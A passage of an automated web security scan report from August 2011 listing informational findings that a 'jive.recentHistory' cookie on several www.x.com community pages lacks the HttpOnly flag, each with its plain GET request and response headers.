Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034313b31342c323034303b31342c323033393b31342c323133313b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:11 GMT; Path=/
Vary: User-Agent
JP: D=90705 t=1313157071522380
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.30. https://www.x.com/community/ppx/global/it

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/it

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/it HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034333b31342c323133303b31342c323034323b31342c323030343b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=83031 t=1313157073107237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.31. https://www.x.com/community/ppx/global/jp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/jp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/jp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133303b31342c323034323b31342c323034313b31342c323034333b31342c323030343b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=64298 t=1313157073255195
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.32. https://www.x.com/community/ppx/global/mx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/mx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/mx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034343b31342c323133303b31342c323030343b31342c323034323b31342c323034333b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=84686 t=1313157074147841
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.33. https://www.x.com/community/ppx/global/nl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/nl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323034333b31342c323133303b31342c323034343b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b31342c323033393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=74016 t=1313157074525656
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.34. https://www.x.com/community/ppx/global/sp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/sp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/sp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=120118 t=1313157075242154
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.35. https://www.x.com/community/ppx/global/uk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.36. https://www.x.com/community/ppx/ipn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ipn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ipn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032383b31342c323032363b31342c323032373b31342c323032303b31342c323031383b31342c323036333b31342c323031373b31342c323030363b31342c323031363b31342c323234363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=93490 t=1313157061548233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.37. https://www.x.com/community/ppx/marketplaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/marketplaces

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/marketplaces HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134323b31342c323134353b31342c323134333b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=108959 t=1313157078551586
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.38. https://www.x.com/community/ppx/mass_pay

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/mass_pay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/mass_pay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031313b31342c323030393b31342c323030373b31342c323030333b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=98932 t=1313157034722623
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.39. https://www.x.com/community/ppx/offlineanddevices

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/offlineanddevices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/offlineanddevices HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134363b31342c323134323b31342c323030353b31342c323134333b31342c323134353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=113532 t=1313157078857855
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.40. https://www.x.com/community/ppx/p2p

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/p2p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/p2p HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134343b31342c323134323b31342c323134333b31342c323134353b31342c323134363b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=81213 t=1313157079302842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.41. https://www.x.com/community/ppx/payflow_link

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_link

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_link HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=81349 t=1313157056540618
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.42. https://www.x.com/community/ppx/payflow_pro

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_pro

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_pro HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031343b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=271432 t=1313157033322018
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.43. https://www.x.com/community/ppx/payflow_xml_reporting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_xml_reporting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_xml_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032373b31342c323032303b31342c323032363b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=106498 t=1313157060903457
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.44. https://www.x.com/community/ppx/pdt

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/pdt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/pdt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032393b31342c323033303b31342c323032303b31342c323032373b31342c323032383b31342c323036333b31342c323032363b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=122974 t=1313157061920177
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.45. https://www.x.com/community/ppx/permissions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/permissions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/permissions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032303b31342c323032363b31342c323031363b31342c323031373b31342c323030363b31342c323031383b31342c323036333b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=124196 t=1313157059978751
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.46. https://www.x.com/community/ppx/press

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/press

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/press HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134393b31342c323038323b31342c323030353b31342c323134363b31342c323134343b31342c323038363b31342c323134323b31342c323134333b31342c323134353b31342c323034373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=85690 t=1313157080601110
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.47. https://www.x.com/community/ppx/recurring_billing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_billing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_billing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031373b31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=113300 t=1313157058930963
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.48. https://www.x.com/community/ppx/recurring_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_payments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=126727 t=1313157058403684
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.49. https://www.x.com/community/ppx/release_notes

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/release_notes

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/release_notes HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
